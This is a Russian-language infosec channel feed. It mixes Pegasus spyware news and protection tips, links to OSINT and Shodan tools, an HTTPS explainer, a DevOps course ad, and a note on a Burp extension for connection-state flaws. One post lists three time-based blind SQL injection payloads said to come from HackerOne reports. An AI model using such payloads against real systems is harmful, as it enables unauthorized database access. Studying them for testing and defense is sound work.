Hacking & InfoSec Portal

Pegasus снова в деле! Стал умнее, незаметнее и почти неуловим Известный шпионский софт Pegasus снова всплыл в новостях. Хотя ему уже несколько лет, появились новые версии — гораздо более продвинутые и сложные для детекта на Android и других устройствах. Pegasus это шпионское ПО, созданное для скрытого слежения за устройством. Оно получает доступ к звонкам, сообщениям, камере, микрофону и даже к зашифрованным чатам и всё это без ведома пользователя. Последние версии Pegasus стали крайне продвинутыми: они умеют обходить современные системы защиты и прячутся глубоко в операционной системе. Как защититься • Скачивай приложения и обновления только из проверенных источников (Google Play или App Store). • Не кликай по подозрительным ссылкам и не открывай неизвестные вложения. • Регулярно обновляй систему и включи автоматическую установку патчей безопасности. • Используй надёжный антивирус и включи Play Protect (для Android). • Проверяй разрешения у приложений и отключай те, что выглядят лишними (доступ к камере, микрофону, геолокации). Видео в этом посте было отредактировано и частично размыто, чтобы скрыть чувствительные технические детали. Оно создано исключительно в образовательных целях, показать, насколько легко шпионское ПО может попасть на устройство, если пользователь не проявляет осторожность. 👉 @cybersecinform

Shodan Eye: инструмент, который собирает всю информацию обо всех устройствах, напрямую подключённых к интернету, по указанным вами ключевым словам. GitHub: https://github.com/BullsEye0/shodan-eye 👉 @cybersecinform

Мои любимые полезные нагрузки для SQL-инъекций: - 'XOR(if(now()=sysdate(),sleep(5*5),0))OR' - ')//OR//MID(0x352e362e33332d6c6f67,1,1)//LIKE//5/**/# - 1-if(mid(version/*f*/(),1,1)=5,sleep/*f*/(5),0)' Я собрал их из отчетов HackerOne. 👉 @cybersecinform

Когда-нибудь задумывался, как HTTPS реально защищает твои данные? Вот что происходит под капотом каждый раз, когда ты заходишь на безопасный сайт: 1. TCP Handshake — твое устройство и сервер договариваются, как будут общаться. 2. Certificate Check — сервер подтверждает свою подлинность с помощью доверенного сертификата. 3. Key Exchange — с помощью асимметричного шифрования обе стороны создают общий сеансовый ключ. 4. Data Transmission — соединение переключается на симметричное шифрование, чтобы данные передавались быстро и безопасно. Асимметричное шифрование —> для безопасного обмена ключами. Симметричное шифрование —> для быстрой передачи данных. 👉 @cybersecinform

OSINT Earth — это передовая платформа, которая служит универсальным каталогом ресурсов для поиска публичных данных со всего мира. http://osint.earth 👉 @cybersecinform

📘 На Stepik вышел курс — «DevOps-инженер: От основ до продакшена» Хотите автоматизировать деплой, управлять инфраструктурой как кодом и выстраивать надёжные CI/CD процессы? Этот курс — полный путь DevOps-инженера. • CI/CD: Jenkins, GitLab CI/CD, GitHub Actions, стратегии развёртывания (Blue-Green, Canary), rollback • Контейнеризация: Docker (образы, Compose, networking), Podman, оптимизация и безопасность контейнеров • Kubernetes: архитектура, Pods, Services, Deployments, Helm, RBAC, Service Mesh (Istio/Linkerd) • Infrastructure as Code: Terraform, Ansible (playbooks, vault), Packer, ArgoCD и Flux для GitOps • Облака: AWS (EC2, EKS, Lambda), GCP, Azure, Yandex Cloud, cost optimization • Мониторинг: Prometheus, Grafana, ELK Stack, Jaeger, OpenTelemetry, SLI/SLO/SLA • Безопасность: SAST/DAST, Vault, Zero Trust, Policy as Code, incident response • Продакшен практики: High Availability, Disaster Recovery, Chaos Engineering, on-call management 🎓 Сертификат — добавьте в резюме или LinkedIn 🚀 Скидка 25%, действует 48 часов 👉 Пройти курс на Stepik

HTTP по идее без состояния, но иногда... это не так. Некоторые серверы рождают невидимые уязвимости, валидируя только первый запрос на каждом TCP/TLS-соединении. Чувак только что опубликовал Custom Action, который помогает обнаружить и эксплуатировать это Установить этот Custom Action можно через расширение Extensibility Helper или скопировать/вставить отсюда: https://gist.github.com/albinowax/2814ce731643791fabbcfe4d319e298b 👉 @cybersecinform

APT Command Cheat Sheet — шпаргалка по APT 👉 @cybersecinform